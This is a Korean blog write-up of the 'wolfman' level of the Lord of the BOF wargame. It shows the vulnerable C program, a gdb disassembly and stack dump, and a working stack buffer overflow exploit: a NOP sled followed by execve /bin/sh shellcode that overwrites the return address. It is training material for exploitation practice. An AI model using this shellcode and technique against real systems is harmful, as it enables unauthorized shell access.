orc / cantata 로 접속
wolfman.c
/*
The Lord of the BOF : The Fellowship of the BOF
- wolfman
- egghunter + buffer hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
이번에도 egg hunter로 인해 환경변수를 사용할 수 없고 저번과 같은 조건이 있다. 같은 방법으로 풀어보도록 하겠다.
wolfman을 카피한 wolfman2를 gdb로 실행시킨다.
[orc@localhost orc]$ bash2
[orc@localhost orc]$ cp wolfman wolfman2
[orc@localhost orc]$ gdb -q wolfman2
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
...
0x80485bd <main+189>: call 0x8048440 <strcpy>
0x80485c2 <main+194>: add %esp,8
0x80485c5 <main+197>: lea %eax,[%ebp-40]
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push 0x8048669
0x80485ce <main+206>: call 0x8048410 <printf>
0x80485d3 <main+211>: add %esp,8
0x80485d6 <main+214>: push 40
0x80485d8 <main+216>: push 0
0x80485da <main+218>: lea %eax,[%ebp-40]
0x80485dd <main+221>: push %eax
0x80485de <main+222>: call 0x8048430 <memset>
0x80485e3 <main+227>: add %esp,12
0x80485e6 <main+230>: leave
0x80485e7 <main+231>: ret
...
strcpy가 끝나는 main+194지점에 브레이크포인트를 걸고 조건에 맞게 실행시켜서 출력시켰다.
(gdb) b *main+194
Breakpoint 1 at 0x80485c2
(gdb) r `python -c 'print "A"*47 + "\xbf"'`
Starting program: /home/orc/wolfman2 `python -c 'print "A"*47 + "\xbf"'`
Breakpoint 1, 0x80485c2 in main ()
(gdb) x/64x $esp
0xbffffad4: 0xbffffae0 0xbffffc5d 0x00000015 0x41414141
0xbffffae4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffaf4: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb04: 0x41414141 0x41414141 0xbf414141 0x00000000
0xbffffb14: 0xbffffb54 0xbffffb60 0x40013868 0x00000002
0xbffffb24: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffb34: 0x00000002 0xbffffb54 0x08048390 0x0804861c
0xbffffb44: 0x4000ae60 0xbffffb4c 0x40013e90 0x00000002
0xbffffb54: 0xbffffc4a 0xbffffc5d 0x00000000 0xbffffc8e
0xbffffb64: 0xbffffcb0 0xbffffcba 0xbffffcc8 0xbffffce7
0xbffffb74: 0xbffffcf3 0xbffffd0c 0xbffffd25 0xbffffd44
0xbffffb84: 0xbffffd4f 0xbffffd5d 0xbffffd9c 0xbffffdab
0xbffffb94: 0xbffffdc0 0xbffffdd0 0xbffffdd9 0xbffffdf4
0xbffffba4: 0xbffffdff 0xbffffe10 0xbffffe1e 0xbffffe26
0xbffffbb4: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffbc4: 0x00000020 0x00000005 0x00000006 0x00000006
bffffb54를 골라 RET자리에 덮어씌웠다.
./wolfman `python -c 'print "\x90"*44+"\x54\xfb\xff\xbf"+"\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
dummy(44) + 주소(4) + nop(10000) + shellcode
공격에 성공했다!
love eyuna
'시스템 해킹 > LOB' 카테고리의 다른 글
| [LOB] darkelf → orge (0) | 2021.02.22 |
|---|---|
| [LOB] wolfman → darkelf (0) | 2021.02.22 |
| [LOB] goblin → orc (0) | 2021.02.21 |
| [LOB] cobolt → goblin (0) | 2021.02.20 |
| [LOB] gremlin → cobolt (0) | 2021.02.20 |